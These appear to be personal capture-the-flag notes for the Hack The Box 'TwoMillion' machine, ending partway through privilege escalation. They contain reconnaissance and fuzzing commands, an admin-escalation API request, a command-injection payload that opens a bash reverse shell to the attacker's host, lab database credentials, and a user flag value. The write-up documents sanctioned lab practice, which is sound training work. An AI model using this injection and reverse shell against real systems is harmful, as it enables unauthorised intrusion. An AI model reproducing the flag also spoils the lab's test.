HTB - TwoMillion
####HTB 2million####
#
#
#Recon
nmap -sV -sC -v 10.129.229.66
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://2million.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
#add to host file
sudo echo '2million.htb 10.129.229.66' >> /etc/hosts
#Found website and theres a login page
#When you input a random account and password you get
#http://2million.htb/login?error=User+not+found
#Tried enumerating from login? with ffuf
ffuf -w /usr/share/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u http://2million.htb/login?FUZZ -fs 3704
#-fs 3704 to remove most of the noise
#only returns error
http://2million.htb/login?error=id
#returns id in the page
#Seems like i can pan pass some inputs here
#Attempted to inject PHP, HTML, JS, SQL, Bash (no bueno)
#Look at the invite code page, found an endpoint
curl -s -X POST http://2million.htb/api/v1/invite/how/to/generate
#ROT13 returns an address
curl -s -X POST http://2million.htb/api/v1/invite/generate
#Returns a base64 string
echo 'SEY2QkQtTklFUlotN1pMREMtTzJKMzY=' | base64 -d
#Returns HF6BD-NIERZ-7ZLDC-O2J36
#Made an account, found a VPN connection file that didn't work
#Some endpoint makes the file
#curled a list of endpoints with
curl -X GET "http://2million.htb/api/v1" -H "Cookie: PHPSESSID=ou73gn1krm2asr0f0b2i31d68r" | jq
#Can't use /api/v1/admin/* but we can add admin to ourselves with
PUT /api/v1/admin/settings/update and change {"loggedin":true,"username":"penis","is_admin":1}
#We have now access to api/v1/admin/*
POST /api/v1/admin/vpn/generate + Content-Type: application/json {"username":"; bash -c 'bash -i >& /dev/tcp/10.10.14.21/6969 0>&1' ;"}
#On attacker run netcat
nc -lvnp 6969
#Looked around for username or passwords and found some in an .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123
#we now ssh as admin with our SuperDuperPass123
ssh admin@10.129.229.66
#We can now read user.txt
2a2286a0cfffc35bc6c21db7892ca63e
#We now need to escalate our privilege
#We can find find a way to upload linpeas.sh to find escalation vulnerabilities
#Theres only 2 port and 22/ssh is available so we use a protocol that shares the port number like SCP
scp ./linpeas.sh admin@10.129.229.66:/home/admin/
#Turns up some vulnerabilities that could be exploited and /var/mail/
cat /var/mail/admin
#Returns a few interesting information
From: ch4p